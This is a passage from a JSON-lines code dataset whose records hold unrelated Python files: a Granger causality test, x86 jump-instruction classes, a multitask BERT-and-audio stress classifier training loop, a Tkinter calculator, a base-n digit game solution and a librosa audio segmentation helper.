classes)","sub_path":"dataset/archive/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"226070129","text":"def grangercausalitytests(x, maxlag, addconst=True, verbose=True):\n \"\"\"\n Four tests for Granger non causality of 2 time series.\n\n All four tests give similar results. `params_ftest` and `ssr_ftest` are\n equivalent based on F test which is identical to lmtest:grangertest in R.\n\n Parameters\n ----------\n x : array_like\n The data for testing whether the time series in the second column Granger\n causes the time series in the first column. Missing values are not\n supported.\n maxlag : {int, Iterable[int]}\n If an integer, computes the test for all lags up to maxlag. If an\n iterable, computes the tests only for the lags in maxlag.\n addconst : bool\n Include a constant in the model.\n verbose : bool\n Print results.\n\n Returns\n -------\n dict\n All test results, dictionary keys are the number of lags. For each\n lag the values are a tuple, with the first element a dictionary with\n test statistic, pvalues, degrees of freedom, the second element are\n the OLS estimation results for the restricted model, the unrestricted\n model and the restriction (contrast) matrix for the parameter f_test.\n\n Notes\n -----\n TODO: convert to class and attach results properly\n\n The Null hypothesis for grangercausalitytests is that the time series in\n the second column, x2, does NOT Granger cause the time series in the first\n column, x1. Granger causality means that past values of x2 have a\n statistically significant effect on the current value of x1, taking past\n values of x1 into account as regressors. We reject the null hypothesis\n that x2 does not Granger cause x1 if the pvalues are below a desired size\n of the test.\n\n The null hypothesis for all four tests is that the coefficients\n corresponding to past values of the second time series are zero.\n\n `params_ftest`, `ssr_ftest` are based on F distribution\n\n `ssr_chi2test`, `lrtest` are based on chi-square distribution\n\n References\n ----------\n .. [1] https://en.wikipedia.org/wiki/Granger_causality\n\n .. [2] Greene: Econometric Analysis\n\n Examples\n --------\n \"\"\"\n x = array_like(x, \"x\", ndim=2)\n if not np.isfinite(x).all():\n raise ValueError(\"x contains NaN or inf values.\")\n addconst = bool_like(addconst, \"addconst\")\n verbose = bool_like(verbose, \"verbose\")\n try:\n maxlag = int_like(maxlag, \"maxlag\")\n if maxlag <= 0:\n raise ValueError(\"maxlag must be a positive integer\")\n lags = np.arange(1, maxlag + 1)\n except TypeError:\n lags = np.array([int(lag) for lag in maxlag])\n maxlag = lags.max()\n if lags.min() <= 0 or lags.size == 0:\n raise ValueError(\n \"maxlag must be a non-empty list containing only \"\n \"positive integers\"\n )\n\n if x.shape[0] <= 3 * maxlag + int(addconst):\n raise ValueError(\n \"Insufficient observations. 
Maximum allowable \"\n \"lag is {0}\".format(int((x.shape[0] - int(addconst)) / 3) - 1)\n )\n\n resli = {}\n\n for mlg in lags:\n result = {}\n if verbose:\n print(\"\\nGranger Causality\")\n print(\"number of lags (no zero)\", mlg)\n mxlg = mlg\n\n # create lagmat of both time series\n dta = lagmat2ds(x, mxlg, trim=\"both\", dropex=1)\n\n # add constant\n if addconst:\n dtaown = add_constant(dta[:, 1 : (mxlg + 1)], prepend=False)\n dtajoint = add_constant(dta[:, 1:], prepend=False)\n if (\n dtajoint.shape[1] == (dta.shape[1] - 1)\n or (dtajoint.max(0) == dtajoint.min(0)).sum() != 1\n ):\n raise InfeasibleTestError(\n \"The x values include a column with constant values and so\"\n \" the test statistic cannot be computed.\"\n )\n else:\n raise NotImplementedError(\"Not Implemented\")\n # dtaown = dta[:, 1:mxlg]\n # dtajoint = dta[:, 1:]\n\n # Run ols on both models without and with lags of second variable\n res2down = OLS(dta[:, 0], dtaown).fit()\n res2djoint = OLS(dta[:, 0], dtajoint).fit()\n\n # print results\n # for ssr based tests see:\n # http://support.sas.com/rnd/app/examples/ets/granger/index.htm\n # the other tests are made-up\n\n # Granger Causality test using ssr (F statistic)\n if res2djoint.model.k_constant:\n tss = res2djoint.centered_tss\n else:\n tss = res2djoint.uncentered_tss\n if (\n tss == 0\n or res2djoint.ssr == 0\n or np.isnan(res2djoint.rsquared)\n or (res2djoint.ssr / tss) < np.finfo(float).eps\n or res2djoint.params.shape[0] != dtajoint.shape[1]\n ):\n raise InfeasibleTestError(\n \"The Granger causality test statistic cannot be computed \"\n \"because the VAR has a perfect fit of the data.\"\n )\n fgc1 = (\n (res2down.ssr - res2djoint.ssr)\n / res2djoint.ssr\n / mxlg\n * res2djoint.df_resid\n )\n if verbose:\n print(\n \"ssr based F test: F=%-8.4f, p=%-8.4f, df_denom=%d,\"\n \" df_num=%d\"\n % (\n fgc1,\n stats.f.sf(fgc1, mxlg, res2djoint.df_resid),\n res2djoint.df_resid,\n mxlg,\n )\n )\n result[\"ssr_ftest\"] = (\n fgc1,\n stats.f.sf(fgc1, mxlg, res2djoint.df_resid),\n res2djoint.df_resid,\n mxlg,\n )\n\n # Granger Causality test using ssr (chi2 statistic)\n fgc2 = res2down.nobs * (res2down.ssr - res2djoint.ssr) / res2djoint.ssr\n if verbose:\n print(\n \"ssr based chi2 test: chi2=%-8.4f, p=%-8.4f, \"\n \"df=%d\" % (fgc2, stats.chi2.sf(fgc2, mxlg), mxlg)\n )\n result[\"ssr_chi2test\"] = (fgc2, stats.chi2.sf(fgc2, mxlg), mxlg)\n\n # likelihood ratio test pvalue:\n lr = -2 * (res2down.llf - res2djoint.llf)\n if verbose:\n print(\n \"likelihood ratio test: chi2=%-8.4f, p=%-8.4f, df=%d\"\n % (lr, stats.chi2.sf(lr, mxlg), mxlg)\n )\n result[\"lrtest\"] = (lr, stats.chi2.sf(lr, mxlg), mxlg)\n\n # F test that all lag coefficients of exog are zero\n rconstr = np.column_stack(\n (np.zeros((mxlg, mxlg)), np.eye(mxlg, mxlg), np.zeros((mxlg, 1)))\n )\n ftres = res2djoint.f_test(rconstr)\n if verbose:\n print(\n \"parameter F test: F=%-8.4f, p=%-8.4f, df_denom=%d,\"\n \" df_num=%d\"\n % (ftres.fvalue, ftres.pvalue, ftres.df_denom, ftres.df_num)\n )\n result[\"params_ftest\"] = (\n np.squeeze(ftres.fvalue)[()],\n np.squeeze(ftres.pvalue)[()],\n ftres.df_denom,\n ftres.df_num,\n )\n\n resli[mxlg] = (result, [res2down, res2djoint, rconstr])\n\n return resli","sub_path":"cs224w/grangercausalitytest.py","file_name":"grangercausalitytest.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"571245310","text":"from X86Instructions import *\n\nclass JumpPredicate():\n\tdef 
__init__(self,name):\n\t\tself.name = name\n\n\tdef __repr__(self):\n\t\treturn self.name\n\n\tdef __str__(self):\n\t\treturn self.name\n\nclass JumpPredicateEnum():\n\tNONE = JumpPredicate(\"jmp\")\n\tZERO = JumpPredicate(\"jz\")\n\tNOTZERO = JumpPredicate(\"jnz\")\n\tNEGATIVE = JumpPredicate(\"js\")\n\tNOTNEGATIVE = JumpPredicate(\"jns\")\n\tOVERFLOW = JumpPredicate(\"jo\")\n\tNOTOVERFLOW = JumpPredicate(\"jno\")\n\tCARRY = JumpPredicate(\"jc\")\n\tNOTCARRY = JumpPredicate(\"jnc\")\n\tBORROW = JumpPredicate(\"jb\")\n\tNOTBORROW = JumpPredicate(\"jae\")\n\tBORROWORZERO = JumpPredicate(\"jbe\")\n\tNOTBORROWNOTZERO = JumpPredicate(\"ja\")\n\tSIGNEDLESS = JumpPredicate(\"jl\")\n\tSIGNEDLESSOREQUAL = JumpPredicate(\"jle\")\n\tSIGNEDGREATER = JumpPredicate(\"jg\")\n\tSIGNEDGREATEROREQUAL = JumpPredicate(\"jge\")\n\nclass JumpInstruction(UnaryInstruction):\n\tdef __init__(self,operand,predicate=JumpPredicateEnum.NONE):\n\t\tif not isinstance(predicate,JumpPredicate):\n\t\t\traise Exception(\"predicate must be JumpPredicate.\")\n\t\tUnaryInstruction.__init__(self,operand)\n\t\tself.predicate = predicate\n\t\tself.operand = operand\n\n\tdef __repr__(self):\n\t\treturn x86InstructionToString(self.__class__.__name__,[self.predicate,self.operand])\n\n\tdef __str__(self):\n\t\treturn x86InstructionToString(self.__class__.__name__,[self.predicate,self.operand])\n\n\tdef printInstruction(self):\n\t\tsize = self.operand.size\n\t\treturn printUnaryX86Instruction(self.predicate.name,self.operand,\"\")\n","sub_path":"AssemblyAST/X86JumpInstructions.py","file_name":"X86JumpInstructions.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"112019273","text":"import json\nimport glob\nimport csv\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom sklearn import svm, tree\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import normalize, scale\nfrom scipy.cluster.vq import whiten\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.manifold import TSNE\nfrom sklearn.linear_model import LinearRegression, LogisticRegression\nimport re\nimport os\n\nfrom transformers import BertTokenizer, BertForSequenceClassification, BertConfig, BertModel\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\nimport torch\nimport math\nimport time\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom liwc import LIWC\n\n\nfrom sklearn.model_selection import StratifiedKFold\n\nimport ass\n\n\ndef get_optimizers(model, learning_rate, adam_epsilon, weight_decay, num_training_steps):\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": weight_decay},\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0},\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate, eps=adam_epsilon)\n # optimizer = SGD(optimizer_grouped_parameters, lr=learning_rate, momentum=0.9)\n\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0,\n num_training_steps=num_training_steps)\n return optimizer, scheduler\n\n\nclass 
DNNAudio(nn.Module):\n def __init__(self):\n super(DNNAudio, self).__init__()\n self.dim = 256\n self.layer1 = nn.Linear(88, self.dim)\n self.layer2 = nn.Linear(self.dim, self.dim)\n # self.layer2 = nn.Linear(256, 1)\n self.layer3 = nn.Linear(self.dim, self.dim)\n # self.layer3 = nn.Linear(256, 1)\n # self.layer4 = nn.Linear(self.dim, 1)\n self.layer4 = nn.Linear(self.dim, self.dim)\n # self.ln = nn.LayerNorm(256)\n # self.bn = nn.BatchNorm1d(256)\n\n def forward(self, input_features):\n # return F.relu(self.layer2(F.relu(self.layer1(input_features))))\n # return self.layer3(F.relu(self.layer2(F.relu(self.layer1(input_features)))))\n return self.layer4(F.relu(self.layer3(F.relu(self.layer2(F.relu(self.layer1(input_features)))))))\n\n\nclass config:\n mode = 'regression'\n\nclass jointTAMulti(nn.Module):\n def __init__(self, TRIconfig):\n super().__init__()\n self.bert = BertModel.from_pretrained('bert-base-uncased')\n self.dropout = nn.Dropout(0.1)\n self.text_emb = nn.Linear(768, 256)\n self.mode = TRIconfig.mode\n self.AudioNet = DNNAudio()\n self.activ = nn.Linear(512, 1)\n self.valence = nn.Linear(512,1)\n self.classify = nn.Linear(512, 2)\n\n def forward(self,\n input_ids,\n token_type_ids,\n attention_mask,\n labels,\n audio_features):\n audio_repr = self.AudioNet(audio_features)\n bert_outputs = self.bert(input_ids, token_type_ids=token_type_ids, attention_mask=attention_mask)\n text_repr = self.text_emb(bert_outputs[1])\n final_repr = torch.cat([audio_repr, text_repr], dim=1)\n final_repr = self.dropout(final_repr)\n # logits = self.classifier(final_repr)\n # print(logits, labels)\n if self.mode == 'activ':\n logits = self.activ(final_repr)\n loss_fct = nn.MSELoss()\n out_loss = loss_fct(logits.view(-1), labels.view(-1))\n elif self.mode == 'valence':\n logits = self.valence(final_repr)\n loss_fct = nn.MSELoss()\n out_loss = loss_fct(logits.view(-1), labels.view(-1))\n else:\n logits = self.classify(final_repr)\n loss_fct = nn.CrossEntropyLoss()\n out_loss = loss_fct(logits.view(-1, 2), labels.view(-1))\n return out_loss, logits\n\n def set_mode(self, mode):\n self.mode = mode\n\n#=====================================================================================================================\nwith open('all_data_joint_fixed_single_task.pkl','rb') as dump_file:\n audios, activation_labels, valence_labels, stress_labels, input_ids, token_type_ids, attention_mask, cv5_ids = pkl.load(dump_file)\n\nprint(audios.shape)\nprint(activation_labels)\nprint(valence_labels)\nprint(stress_labels)\n\nsp = cv5_ids[2]\n# train_a, train_l, train_labels = audios[sp[0]], input_ids[sp[0]], valence_labels[sp[0]]\n# test_a, test_l, test_labels = audios[sp[1]], input_ids[sp[1]], valence_labels[sp[1]]\n# train_a, train_l, train_labels = audios[sp[0]], input_ids[sp[0]], activation_labels[sp[0]]\n# test_a, test_l, test_labels = audios[sp[1]], input_ids[sp[1]], activation_labels[sp[1]]\ntv_a, tv_l, tv_labels = audios[sp[0]], input_ids[sp[0]], stress_labels[sp[0]]\ntrain_num = len(tv_a) - 200\ntrain_a, train_l, train_labels = tv_a[:train_num], tv_l[:train_num], tv_labels[:train_num]\ndev_a, dev_l, dev_labels = tv_a[train_num:], tv_l[train_num:], tv_labels[train_num:]\ntest_a, test_l, test_labels = audios[sp[1]], input_ids[sp[1]], stress_labels[sp[1]]\n\ntrain_activ, dev_activ, test_activ, train_valence, dev_valence, test_valence = activation_labels[sp[0]][:train_num], \\\n activation_labels[sp[0]][train_num:], activation_labels[sp[1]], valence_labels[sp[0]][:train_num], \\\n 
valence_labels[sp[0]][train_num:], valence_labels[sp[1]],\n\ntv_token_type_ids, test_token_type_ids, tv_attention_mask, test_attention_mask = token_type_ids[sp[0]], \\\n token_type_ids[sp[1]], attention_mask[sp[0]], attention_mask[sp[1]]\n\ntrain_token_type_ids, train_attention_mask = tv_token_type_ids[:train_num], tv_attention_mask[:train_num]\ndev_token_type_ids, dev_attention_mask = tv_token_type_ids[train_num:], tv_attention_mask[train_num:]\n\nn_train = len(train_a)\nn_dev = len(dev_a)\nn_test = len(test_a)\n\n\nprint(train_l.shape, train_a.shape)\n\nTRIconfig = config()\nTRIconfig.mode = 'classify'\n\n# to Tensors\ntrain_labels, dev_labels, test_labels = torch.LongTensor(train_labels), torch.LongTensor(dev_labels), \\\n torch.LongTensor(test_labels)\ntrain_activ, dev_activ, test_activ, train_valence, dev_valence, test_valence = \\\n torch.FloatTensor(train_activ), torch.FloatTensor(dev_activ), torch.FloatTensor(test_activ), \\\n torch.FloatTensor(train_valence), torch.FloatTensor(dev_valence), torch.FloatTensor(test_valence)\n\ntrain_a, dev_a, test_a = torch.FloatTensor(train_a), torch.FloatTensor(dev_a), torch.FloatTensor(test_a)\n\ntrain_l, dev_l, test_l, train_token_type_ids, dev_token_type_ids, test_token_type_ids = torch.LongTensor(train_l), \\\n torch.LongTensor(dev_l), \\\n torch.LongTensor(test_l), \\\n torch.LongTensor(train_token_type_ids), \\\n torch.LongTensor(dev_token_type_ids), \\\n torch.LongTensor(test_token_type_ids)\n\ntrain_attention_mask, dev_attention_mask, test_attention_mask = torch.FloatTensor(train_attention_mask), \\\n torch.FloatTensor(dev_attention_mask), \\\n torch.FloatTensor(test_attention_mask)\n\n\nmodel = jointTAMulti(TRIconfig).to('cuda')\n\neval_every = 5\nbatch_size = 32\ntest_batch_size = 2\ndev_batch_size = 2\nmax_epochs = 1000\nt_total = math.ceil(n_train / batch_size) * max_epochs\nlr = 3e-4\nepsilon = 1e-8\nmax_grad_norm = 1.0\nweight_decay = 0.0\n\noptimizer, scheduler = get_optimizers(model, learning_rate=lr, adam_epsilon=epsilon, weight_decay=weight_decay,\n num_training_steps=t_total)\n\n# loss_fn = torch.nn.CrossEntropyLoss().cuda()\nmodel.train()\nmodel.zero_grad()\n# pre-training\npre_train_epoch = 0\n# model.set_mode('regression')\n\nsample_distribution = [0.33, 0.33, 0.34]\nmoving_metric_activ = []\nmoving_metric_valence = []\nmoving_metric_stress = []\nfor ep in range(max_epochs):\n total_samples = 0\n avg_loss = 0\n n_batch = 0\n model.train()\n print(sample_distribution)\n while total_samples < n_train:\n optimizer.zero_grad()\n selected_id = np.random.permutation(n_train)[:batch_size]\n batch_a = train_a[selected_id].to('cuda')\n batch_l = train_l[selected_id].to('cuda')\n\n batch_ty = train_token_type_ids[selected_id].to('cuda')\n batch_am = train_attention_mask[selected_id].to('cuda')\n # switch between modes uniformly\n selected_task = np.random.choice([0,1,2], p=sample_distribution)\n if selected_task == 0:\n ans = train_activ[selected_id].to('cuda')\n model.set_mode('activ')\n elif selected_task == 1:\n ans = train_valence[selected_id].to('cuda')\n model.set_mode('valence')\n else:\n ans = train_labels[selected_id].to('cuda')\n model.set_mode('classify')\n\n total_samples += batch_size\n loss, logits = model(input_ids=batch_l, token_type_ids=batch_ty, attention_mask=batch_am, labels=ans, audio_features=batch_a)\n # print(loss)\n # logits = torch.squeeze(logits, dim=1)\n # print(preds[0], preds[1])\n # print(preds.shape, ans.shape)\n # print(preds, ans)\n loss.backward()\n # print(loss.data.cpu().numpy())\n avg_loss += 
loss.data.cpu().numpy()\n n_batch += 1.\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)\n optimizer.step()\n scheduler.step()\n model.zero_grad()\n\n torch.cuda.empty_cache()\n\n del batch_l, batch_ty, batch_am, ans, batch_a\n torch.cuda.empty_cache()\n avg_loss = avg_loss / n_batch\n print(\"epoch: %d rmse/ce: %f\" % (ep + 1, avg_loss ** 0.5))\n\n # dev set metrics\n idx = 0\n model.eval()\n total_dev_loss_activ = 0.\n total_dev_loss_valence = 0.\n n_batch = 0\n dev_preds = np.array([])\n while idx < n_dev:\n dev_batch_a = dev_a[idx:(idx + dev_batch_size)].to('cuda')\n dev_batch_l = dev_l[idx:(idx + dev_batch_size)].to('cuda')\n dev_batch_ty = dev_token_type_ids[idx:(idx + dev_batch_size)].to('cuda')\n dev_batch_am = dev_attention_mask[idx:(idx + dev_batch_size)].to('cuda')\n dev_ans_activ = dev_activ[idx:(idx + dev_batch_size)].to('cuda')\n dev_ans_valence = dev_valence[idx:(idx + dev_batch_size)].to('cuda')\n dev_ans_stress = dev_labels[idx:(idx + dev_batch_size)].to('cuda')\n # run on each task\n model.set_mode('activ')\n loss_activ, _ = model(input_ids=dev_batch_l,\n token_type_ids=dev_batch_ty,\n attention_mask=dev_batch_am,\n labels=dev_ans_activ,\n audio_features=dev_batch_a)\n mse = loss_activ.data.cpu().numpy()\n total_dev_loss_activ += mse\n\n model.set_mode('valence')\n loss_valence, _ = model(input_ids=dev_batch_l,\n token_type_ids=dev_batch_ty,\n attention_mask=dev_batch_am,\n labels=dev_ans_valence,\n audio_features=dev_batch_a)\n mse = loss_valence.data.cpu().numpy()\n total_dev_loss_valence += mse\n\n model.set_mode('classify')\n _, logits = model(input_ids=dev_batch_l,\n token_type_ids=dev_batch_ty,\n attention_mask=dev_batch_am,\n labels=dev_ans_stress,\n audio_features=dev_batch_a)\n _, batch_eval_preds = logits.data.cpu().max(1)\n dev_preds = np.concatenate((dev_preds, batch_eval_preds), axis=-1)\n\n idx += dev_batch_size\n torch.cuda.empty_cache()\n n_batch += 1.\n\n del dev_batch_l, dev_batch_ty, dev_batch_am, dev_ans_activ, dev_ans_valence, dev_ans_stress, dev_batch_a\n torch.cuda.empty_cache()\n dev_loss_activ = (total_dev_loss_activ / n_batch) ** 0.5\n dev_loss_valence = (total_dev_loss_valence / n_batch) ** 0.5\n\n dev_precison, dev_recall, dev_fscore, support = precision_recall_fscore_support(dev_labels.cpu().numpy(), dev_preds,\n labels=[1], average=None)\n dev_acc = float(sum(dev_preds == dev_labels.cpu().numpy())) / len(dev_preds)\n # print(dev_preds, dev_labels.cpu().numpy())\n print(dev_loss_activ, dev_loss_valence, dev_acc, dev_precison, dev_recall, dev_fscore)\n moving_metric_activ.append(dev_loss_activ)\n moving_metric_valence.append(dev_loss_valence)\n moving_metric_stress.append(dev_acc)\n\n # update distribution\n if ep < 10:\n sample_distribution = [0.33, 0.33, 0.34]\n else:\n rate_active = dev_loss_activ / np.mean(moving_metric_activ[ep-10:ep]) * 10\n rate_valence = dev_loss_valence / np.mean(moving_metric_valence[ep - 10:ep]) * 10\n rate_stress = dev_acc / (np.mean(moving_metric_stress[ep - 10:ep]) + 1e-5) * 10\n total_exp = np.exp(rate_active) + np.exp(rate_valence) + np.exp(rate_stress)\n sample_distribution = [np.exp(rate_active) / total_exp, np.exp(rate_valence) / total_exp, 1 - np.exp(rate_active) / total_exp - np.exp(rate_valence) / total_exp]\n\n # do test for classification\n if ep % eval_every == 0:\n idx = 0\n model.set_mode('classify')\n model.eval()\n total_loss = 0.\n eval_preds = np.array([])\n n_batch = 0\n while idx < n_test:\n test_batch_a = test_a[idx:(idx + test_batch_size)].to('cuda')\n\n test_batch_l = 
test_l[idx:(idx + test_batch_size)].to('cuda')\n test_batch_ty = test_token_type_ids[idx:(idx + test_batch_size)].to('cuda')\n test_batch_am = test_attention_mask[idx:(idx + test_batch_size)].to('cuda')\n # time.sleep(20)\n # exit()\n test_ans = test_labels[idx:(idx + test_batch_size)].to('cuda')\n\n loss, logits = model(input_ids=test_batch_l,\n token_type_ids=test_batch_ty,\n attention_mask=test_batch_am,\n labels=test_ans,\n audio_features=test_batch_a)\n if TRIconfig.mode == 'regression':\n mse = loss.data.cpu().numpy()\n total_loss += mse\n else:\n _, batch_eval_preds = logits.data.cpu().max(1)\n # print(batch_eval_preds, test_ans)\n eval_preds = np.concatenate((eval_preds, batch_eval_preds), axis=-1)\n # test_pred = torch.squeeze(test_pred, dim=1)\n '''if idx == 0:\n print(logits, test_ans)'''\n\n idx += test_batch_size\n torch.cuda.empty_cache()\n n_batch += 1.\n\n del test_batch_l, test_batch_ty, test_batch_am, test_ans, test_batch_a\n torch.cuda.empty_cache()\n # metrics\n if TRIconfig.mode == 'regression':\n print('evaluation rmse: %f' % (total_loss / n_batch) ** 0.5)\n else:\n precison, recall, fscore, support = precision_recall_fscore_support(test_labels.cpu().numpy(), eval_preds,\n labels=[1], average=None)\n # print('saving:')\n print('=============stress metrics===================')\n print(float(sum(eval_preds == test_labels.cpu().numpy())) / len(eval_preds))\n print(precison, recall, fscore, support)\n # print('saving:')\n\n '''model_dir = save_dir + '%d' % (ep+1)\n os.mkdir(model_dir)\n model.save_pretrained(model_dir)'''","sub_path":"late_fusion_multi_task_dynamic.py","file_name":"late_fusion_multi_task_dynamic.py","file_ext":"py","file_size_in_byte":16222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"203767671","text":"from tkinter import *\n\ndef btnClick(numbers):\n global operator\n operator = operator + str(numbers)\n text_Input.set(operator)\n\n\ndef btnClearDisplay():\n global operator\n operator = ''\n text_Input.set(operator)\n\n\ndef btnDeleteDisplay():\n global operator\n operator = str(operator[0:-1])\n text_Input.set(operator)\n\n\ndef btnEqualsInput():\n try:\n global operator\n sumup = str(eval(operator))\n text_Input.set(sumup)\n operator = ''\n\n except ZeroDivisionError:\n text_Input.set('Error')\n\n\n\ncal = Tk()\ncal.title('Калькулятор')\noperator = ''\ntext_Input = StringVar()\ncal.eval('tk::PlaceWindow %s center' % cal.winfo_pathname(cal.winfo_id()))\n\ntxtDisplay = Entry(cal, font=('arial', 20, 'bold'), textvariable=text_Input, bd=45, insertwidth=5,\n bg='tomato', justify='right').grid(columnspan=4)\nbtn7 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='7', bg='tomato', command=lambda: btnClick(7)).grid(row=1, column=0)\nbtn8 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='8', bg='tomato', command=lambda: btnClick(8)).grid(row=1, column=1)\nbtn9 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='9', bg='tomato', command=lambda: btnClick(9)).grid(row=1, column=2)\nAddition = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='+', bg='tomato', command=lambda: btnClick('+')).grid(row=1, column=3)\n# Next row\nbtn4 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='4', bg='tomato', command=lambda: btnClick(4)).grid(row=2, column=0)\nbtn5 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n 
text='5', bg='tomato', command=lambda: btnClick(5)).grid(row=2, column=1)\nbtn6 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='6', bg='tomato', command=lambda: btnClick(6)).grid(row=2, column=2)\nSubtraction = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='-', bg='tomato', command=lambda: btnClick('-')).grid(row=2, column=3)\n# Next row\nbtn1 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='1', bg='tomato', command=lambda: btnClick(1)).grid(row=3, column=0)\nbtn2 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='2', bg='tomato', command=lambda: btnClick(2)).grid(row=3, column=1)\nbtn3 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='3', bg='tomato', command=lambda: btnClick(3)).grid(row=3, column=2)\nMultiply = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='*', bg='tomato', command=lambda: btnClick('*')).grid(row=3, column=3)\n# Next row\nbtn0 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='0', bg='tomato', command=lambda: btnClick(0)).grid(row=4, column=0)\nbtnClear = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='C', bg='tomato', command=btnClearDisplay).grid(row=4, column=1)\nbtnd = Button(cal, padx=22, pady=20, bd=5, fg='black', font=('arial', 20, 'bold'),\n text='<', bg='tomato', command=btnDeleteDisplay).grid(row=4, column=2)\nDivison = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='/', bg='tomato', command=lambda: btnClick('/')).grid(row=4, column=3)\n# Next row\nbtnEquals = Button(cal, padx=170, pady=10, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='=', bg='tomato', command=btnEqualsInput).grid(row=5, columnspan=4)\n\ncal.mainloop()","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"92766007","text":"n = 16 # base n\r\nt = 16# how many digits to compute in advance\r\nm = 2 # number of players in the game\r\np = 2 # Tube's turn order\r\n\r\nnum = ''\r\nresult = ''\r\n\r\nfor i in range(60): # strip the two leading characters produced when formatting base-n numbers before storing\r\n\r\n if(n == 2):\r\n \r\n a = str(bin(i))\r\n a = a.replace(\"0b\",\"\")\r\n num += a\r\n \r\n if(n == 8):\r\n \r\n a = str(oct(i))\r\n a = a.replace(\"0o\",\"\")\r\n num += a\r\n\r\n if(n == 10):\r\n\r\n num += str(i)\r\n\r\n if(n == 16):\r\n \r\n a = str(hex(i))\r\n a = a.replace(\"0x\",\"\")\r\n num += a\r\n\r\narr = list(num)\r\n\r\nfor i in range(t):\r\n result += arr[(p-1)+(i*m)]\r\n\r\nprint(result)\r\n","sub_path":"카카오 2018 2차/kakao1.py","file_name":"kakao1.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"620973566","text":"import librosa as lr\nimport numpy as np\nimport SoundMusic as sm\nfrom SoundMusic.sound import SoundObject\n\nMIN_DB = 0\nMAX_DB = 210\nMIN_LEN = 0.5\nMAX_LEN = 5.0\n\ndef extract(so, min_db, max_db, min_len, max_len):\n # Recursively search for the best threshold.\n samples = so.samples\n sr = sm.sound.SAMPLE_RATE\n if abs(min_db - max_db) < 2.0:\n segments = lr.effects.split(samples, top_db=max_db)\n segments = [(s[0], s[1] - 1) for s in segments if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n return segments\n \n s1 = lr.effects.split(samples, top_db=(min_db + (max_db - min_db) * (1 / 4)))\n s1 = 
[(s[0], s[1] - 1) for s in s1 if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n s2 = lr.effects.split(samples, top_db=(min_db + (max_db - min_db) * (3 / 4)))\n s2 = [(s[0], s[1] - 1) for s in s2 if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n s3 = lr.effects.split(samples, top_db=(min_db + (max_db - min_db) / 2))\n s3 = [(s[0], s[1] - 1) for s in s3 if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n \n if len(s3) > len(s1) and len(s3) > len(s2):\n return extract(so, min_db + (max_db - min_db) * (1 / 4),\n min_db + (max_db - min_db) * (3 / 4), min_len, max_len)\n elif len(s1) > len(s2):\n return extract(so, min_db, min_db + (max_db - min_db) / 2, min_len, max_len)\n elif len(s1) < len(s2):\n return extract(so, min_db + (max_db - min_db) / 2, max_db, min_len, max_len)\n else:\n t1 = extract(so, min_db, min_db + (max_db - min_db) / 2,min_len, max_len)\n t2 = extract(so, min_db + (max_db - min_db) / 2, max_db, min_len, max_len)\n if len(t1) >= len(t2):\n return t1\n else:\n return t2\n\ndef get_sounds(so, min_db=None, max_db=None, min_len=None, max_len=None):\n global MIN_DB, MAX_DB, MIN_LEN, MAX_LEN\n min_db = min_db or MIN_DB\n max_db = max_db or MAX_DB\n min_len = min_len or MIN_LEN\n max_len = max_len or MAX_LEN\n segments = extract(so, min_db, max_db, min_len, max_len)\n lso = []\n samples = so.samples\n for s in segments:\n segment_samples = samples[s[0]:s[1]]\n nso = 